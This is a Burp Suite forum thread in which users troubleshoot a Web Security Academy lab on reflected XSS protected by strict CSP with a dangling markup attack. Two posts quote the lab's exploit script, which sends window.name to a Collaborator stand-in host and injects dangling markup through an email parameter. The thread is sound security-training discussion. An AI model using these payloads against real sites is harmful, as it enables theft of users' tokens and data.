Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

In laboratory work, a request for a collaborator is not sent

Andrii | Last updated: Dec 03, 2023 08:22AM UTC

In laboratory work: Lab: Reflected XSS protected by very strict CSP, with dangling markup attack, a request for a collaborator is not sent. I go to the exploit server and insert the appropriate script: <script> if(window.name) { new Image().src='//BURP-COLLABORATOR-SUBDOMAIN?'+encodeURIComponent(window.name); } else { location = 'https://YOUR-LAB-ID.web-security-academy.net/my-account?email=%22%3E%3Ca%20href=%22https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/exploit%22%3EClick%20me%3C/a%3E%3Cbase%20target=%27'; } </script> in the body and click on deliver to victim, but nothing comes to the collaborator

Ben, PortSwigger Agent | Last updated: Dec 04, 2023 10:07AM UTC

Hi Andrii, To confirm, some Chrome updates have broken the current solution for this lab. We believe that we have another way of solving it but are currently running a little competition to see if any other users can also figures this out: https://twitter.com/portswiggerres/status/1726605124443750893?s=46 We will update the official solution in due course.

Mohamed | Last updated: Mar 02, 2024 10:13PM UTC

<script> if(window.name) { new Image().src='//BURP-COLLABORATOR-SUBDOMAIN?'+encodeURIComponent(window.name); } else { location = 'https://0a6a003a04995b67814670ed00a4008f.web-security-academy.net/post?postId=1'; } </script>

Rogucker | Last updated: Mar 11, 2024 02:43PM UTC

Facing the same issue in Mozilla Firefox. No Interactions in Burp.

Ben, PortSwigger Agent | Last updated: Mar 11, 2024 05:31PM UTC